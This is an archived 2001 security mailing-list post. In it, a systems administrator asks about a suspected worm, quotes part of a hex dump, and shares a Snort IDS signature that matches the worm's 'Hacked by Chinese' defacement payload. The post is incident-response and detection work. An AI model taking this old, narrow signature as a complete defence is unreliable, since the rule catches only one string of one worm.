> 0x0440 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0450 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0460 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0470 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0480 2020 20 ...
>
> Any ideas? If this is a worm, it's already got 7650 hosts. I'm logging this all the logs on my IDS hosts with the following signature:
> alert TCP $EXTERNAL any -> $INTERNAL any (msg: "Hacked by Chinese"; dsize: >1000; flags: P+; content: "|2e776f72 6d2e636f 6d20213c 62723e3c|";)
>
> Having just written the rule and popped it in the IDS, I've seen 34 connections from 11 different hosts. Looks bad.
>
> Rgds,
>
> --
>
> Scott Nursten - Systems Administrator
> ----------------------------------------------
> ddi: +44 (0) 1293 744 122
> work: +44 (0) 1293 402 040
> fax: +44 (0) 1293 402 050
> email: scottnat_private
> wwweb: http://www.streetsonline.co.uk
> ----------------------------------------------
>
> "Without order nothing can exist - without chaos nothing can evolve."
--
Scott Nursten - Systems Administrator
----------------------------------------------
ddi: +44 (0) 1293 744 122
work: +44 (0) 1293 402 040
fax: +44 (0) 1293 402 050
email: scottnat_private
wwweb: http://www.streetsonline.co.uk
----------------------------------------------
"Without order nothing can exist - without chaos nothing can evolve."
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see:
http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:37:56 PDT